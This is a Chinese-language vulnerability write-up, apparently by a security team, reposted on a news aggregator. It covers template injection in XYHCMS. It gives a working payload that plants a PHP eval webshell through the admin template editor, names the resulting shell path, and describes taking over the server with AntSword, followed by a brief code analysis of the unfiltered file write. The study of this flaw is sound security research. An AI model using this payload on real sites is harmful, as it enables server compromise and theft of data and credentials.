Redian新闻
>
xyhcms 代码审计之模板注入

xyhcms 代码审计之模板注入

科技

本地环境搭建:

官网下载:http://www.xyhcms.com/down

安装步骤:


前台效果

开启后台

后台默认是关闭的,手工打开,配置如下:
打开config.php文件,将Manage放到上面,效果如下图

此时登录后台程序:
地址如下:

http://www.xyhcms.com/index.php?s=/Manage/Login/index

登录后效果:

构建后门

安装完以后,查看后台的编辑功能,如下:

点击编辑:

在模板的下部分,添加恶意代码:{:S(“s”,’
eval($POST[x]);//‘)}保存成功后,前台访问:

http://www.xyhcms.com

此时系统就给生成了一句话木马文件,路径为:

http://www.xyhcms.com/app/runtime/temp/h8CFnHw03c7c0ace395d80182db07ae2c30f034.php

访问,post传参:【x=phpinfo();】后就可以看到恶意代码被执行:

使用蚁剑链接木马,获得服务器权限:

项目所有文件信息:

查看数据配置信息:

代码分析:

File.class.php文件中有写入文件的操作,如下图:

此时并没有对文件内容过过滤,接着找到代用它的上级调用方法:

所以结合模板编辑的功能,虽然做了常规的PHP的过滤如下图所示:

但是通过这种合规函数变相绕过,就可以拿些服务器权限,造成服务器沦陷。

至此,通过系统合规函数,构建恶意代码,实现代码执行。,拿到了服务器全部权限、源码,以及数据库信息,造成了很严重的后果。

E

N

D



Tide安全团队正式成立于2019年1月,是新潮信息旗下以互联网攻防技术研究为目标的安全团队,团队致力于分享高质量原创文章、开源安全工具、交流安全技术,研究方向覆盖网络攻防、系统安全、Web安全、移动终端、安全开发、物联网/工控安全/AI安全等多个领域。

团队作为“省级等保关键技术实验室”先后与哈工大、齐鲁银行、聊城大学、交通学院等多个高校名企建立联合技术实验室。团队公众号自创建以来,共发布原创文章400余篇,自研平台达到31个,目有18个平台已开源。此外积极参加各类线上、线下CTF比赛并取得了优异的成绩。如有对安全行业感兴趣的小伙伴可以踊跃加入或关注我们


微信扫码关注该文公众号作者

戳这里提交新闻线索和高质量文章给我们。
相关阅读
路维光电通过科创板注册:年营收5亿 杜武兵为实控人去老四川庆祝一下警惕 ◇ CMHC称:加拿大华裔房产平均净值是白人一倍!房价暴涨华人收益最大!衔接中西文化,为地产行业注入新能量 |《2022 Luxury Listings ·胡润加拿大最具潜力开发商TOP 10》发布!上海医药2022年一季报点评:主营业务稳健增长,定增落地注入新动能!【东吴医药朱国广团队】代码审计之逃不过的命运开源大模型的力量:为AI注入“灵魂”,和你一起玩剧本杀聚胶新材通过创业板注册:年营收10.5亿 拟募资4.8亿天气不配合坐在四月的海边晒太阳SQL注入测试视频CMS是什么?你为什么需要它?极致CMS建站系统代码审计之旅国博电子通过科创板注册:年营收25亿 国基南方为大股东餐馆老板注意:$3000援助金,无需偿还,还有最后三天截止申请新视云被终止创业板注册:年营收3.88亿 曾拟募资5.58亿用全新「Galaxy」配色,解读 MB.01 系列的价值攀升【今晚七点】统计之都云讲堂第五讲 | 袁凡:探索定西市的 Sci-Hub 流量之谜郁金香盛开!晶华微电子通过科创板注册:年营收1.73亿 拟募资7.5亿前四大高级审计告诉你:如何准备审计面试统计之都云讲堂第四讲回顾 | 杨灿:使用全基因组汇总统计数据加强因果推断家长拒绝破窗救车内幼童:应把孩子的命放在精明算计之上|自由谈重磅 ◇ 加国央行暴力加息没完!基准利率或至3.5%!但CMHC称房价最多下跌5%华联控股的同业竞争猜想:资产注入还是四度转型?数字娱乐创作团队「OXYZ3」​完成天使轮融资,次世文化独家投资|36氪首发首次!注入年轻的脑脊液,或能逆转大脑衰老华盛锂电通过科创板注册:年营收10亿 比亚迪是股东你是我的四月天Djinn:一个受 Jinja2 启发的代码生成器和模板语言 | Linux 中国安省3400米滨水区将成为最先进工业园! 38亿加币注入, 再创2.3万个就业机会!毕得医药递交科创板注册:年营收6亿 拟募资4.34亿中航无人机通过科创板注册:拟募资16.4亿 生产大型无人机【微报告】低代码/零代码平台应用实践与趋势研究:制造业篇 | 甲子光年活久见!上市公司伪造审计报告被发现,竟说是被审计师陷害?真相是…
logo
联系我们隐私协议©2024 redian.news
Redian新闻
Redian.news刊载任何文章,不代表同意其说法或描述,仅为提供更多信息,也不构成任何建议。文章信息的合法性及真实性由其作者负责,与Redian.news及其运营公司无关。欢迎投稿,如发现稿件侵权,或作者不愿在本网发表文章,请版权拥有者通知本网处理。